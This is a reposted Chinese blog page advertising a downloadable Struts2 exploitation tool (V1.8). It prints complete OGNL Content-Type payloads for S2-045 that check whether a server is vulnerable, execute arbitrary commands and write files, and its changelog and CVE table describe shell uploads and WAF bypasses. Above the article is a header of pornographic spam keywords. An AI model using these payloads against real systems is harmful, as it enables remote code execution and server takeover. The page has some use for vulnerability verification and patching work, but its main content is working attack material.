日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

s2 安恒 漏洞验证工具_Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)

發(fā)布時(shí)間:2023/12/4 编程问答 34 豆豆
生活随笔 收集整理的這篇文章主要介紹了 s2 安恒 漏洞验证工具_Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046) 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

Struts2漏洞利用工具下載(已更新V1.8版)

2017-03-21:

增加S2-046,官方發(fā)布S2-046和S2-045漏洞引發(fā)原因一樣,只是利用漏洞的位置發(fā)生了變化,S2-046方式可能繞過(guò)部分WAF防護(hù),存在S2-045就存在S2-046。http://struts.apache.org/docs/s2-046.html、

2017-03-07:

增加安恒信息研究員nike.zheng發(fā)現(xiàn)的S2-045,jakatar處理復(fù)雜數(shù)據(jù)類型時(shí),異常處理不當(dāng),導(dǎo)致OGNL代碼執(zhí)行,通過(guò)在請(qǐng)求的Content-Type頭中構(gòu)造OGNL表達(dá)式來(lái)執(zhí)行Java代碼。http://struts.apache.org/docs/s2-045.html

相關(guān)exp:

S2-045:

1.驗(yàn)證漏洞,修改Content-Type,返回內(nèi)容為“webpath”代表存在漏洞。

%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('web')).(#res.getWriter().print('path')).(#res.getWriter().flush()).(#res.getWriter().close())}

2.執(zhí)行命令

%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#s=new java.util.Scanner((new java.lang.ProcessBuilder('[cmd]'.toString().split('s'))).start().getInputStream()).useDelimiter('AAAA')).(#str=#s.hasNext()?#s.next():'').(#res.getWriter().print(#str)).(#res.getWriter().flush()).(#res.getWriter().close()).(#s.close())}

3.上傳文件:

%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(new java.io.BufferedWriter(new java.io.FileWriter([path])).append(#req.getHeader('test')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}

S2-032 20160426??漏洞參考 http://seclab.dbappsecurity.com.cn/?p=924

更新日志:

2017-03-21:

增加S2-046,官方發(fā)布S2-046和S2-045漏洞引發(fā)原因一樣,只是利用漏洞的位置發(fā)生了變化,S2-046方式可能繞過(guò)部分WAF防護(hù),存在S2-045就存在S2-046。http://struts.apache.org/docs/s2-046.html

2017-03-07:

增加安恒信息研究員nike.zheng發(fā)現(xiàn)的S2-045,jakatar處理復(fù)雜數(shù)據(jù)類型時(shí),異常處理不當(dāng),導(dǎo)致OGNL代碼執(zhí)行,通過(guò)在請(qǐng)求的Content-Type頭中構(gòu)造OGNL表達(dá)式來(lái)執(zhí)行Java代碼。http://struts.apache.org/docs/s2-045.html

2016-04-26:

增加最新的S2-032遠(yuǎn)程代碼執(zhí)行漏洞,和S2-019很相似。

參考:http://seclab.dbappsecurity.com.cn/?p=924

2015-12-01:

采用scanner讀數(shù)據(jù)流,再也不用擔(dān)心s16不能執(zhí)行net?user/ipconfig/netstat?-an等命令了。

增加復(fù)雜數(shù)據(jù)包(multipart/form-data)提交方式進(jìn)行漏洞利用,可繞過(guò)部分防護(hù)。可執(zhí)行命令,暫時(shí)無(wú)法上傳文件。

2014-11-12:

最近遇到s19這個(gè)debug模式開(kāi)啟導(dǎo)致代碼執(zhí)行,這個(gè)有點(diǎn)少,但還是有一些,為了方便大家把13版本修改了一下。可以利用這個(gè)漏洞執(zhí)行命令、上傳shell。

警告:

本工具為漏洞自查工具,請(qǐng)勿非法攻擊他人網(wǎng)站!

==漏洞編號(hào)==============影響版本=========================官方公告==========================================影響范圍=====

S2-045?CVE-2017-5638?Struts?2.3.5-2.3.31,?Struts?2.5-2.5.10?http://struts.apache.org/docs/s2-045.html?影響范圍較大

S2-037?CVE-2016-4438?Struts?2.3.20-2.3.28.1?http://struts.apache.org/docs/s2-037.html?影響范圍小

S2-032?CVE-2016-3081?Struts?2.3.18-2.3.28?http://struts.apache.org/release/2.3.x/docs/s2-032.html?影響范圍小

S2-020?CVE-2014-0094?Struts?2.0.0-2.3.16?http://struts.apache.org/release/2.3.x/docs/s2-020.html?影響范圍小

S2-019?CVE-2013-4316?Struts?2.0.0-2.3.15.1?http://struts.apache.org/release/2.3.x/docs/s2-019.html?影響范圍一般

S2-016?CVE-2013-2251?Struts?2.0.0-2.3.15?http://struts.apache.org/release/2.3.x/docs/s2-016.html?影響范圍非常大

S2-013?CVE-2013-1966?Struts?2.0.0-2.3.14?http://struts.apache.org/release/2.3.x/docs/s2-013.html?未添加,S2-016范圍內(nèi)

S2-009?CVE-2011-3923?Struts?2.0.0-2.3.1.1?http://struts.apache.org/release/2.3.x/docs/s2-009.html?未添加,S2-016范圍內(nèi)

S2-005?CVE-2010-1870?Struts?2.0.0-2.1.8.1?http://struts.apache.org/release/2.2.x/docs/s2-005.html?未添加,S2-016范圍內(nèi)

僅提供驗(yàn)證漏洞使用,請(qǐng)勿非法使用,產(chǎn)生的任何法律問(wèn)題,一概與本人無(wú)關(guān)。

下載地址:

文件名稱: Struts2漏洞利用工具2017版.exe

文件大小: 104 KB (107008 字節(jié))

文件版本: 1.8.0.0

修改時(shí)間: 2017年03月22日,17:39:29

MD5: 3B405C30A7028E05742D0FBF0961E6B2

SHA1: 1D69338543544B31444D0173C08E706D57F148CB

CRC32: 97AC167B

計(jì)算時(shí)間: 0.00s

總結(jié)

以上是生活随笔為你收集整理的s2 安恒 漏洞验证工具_Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。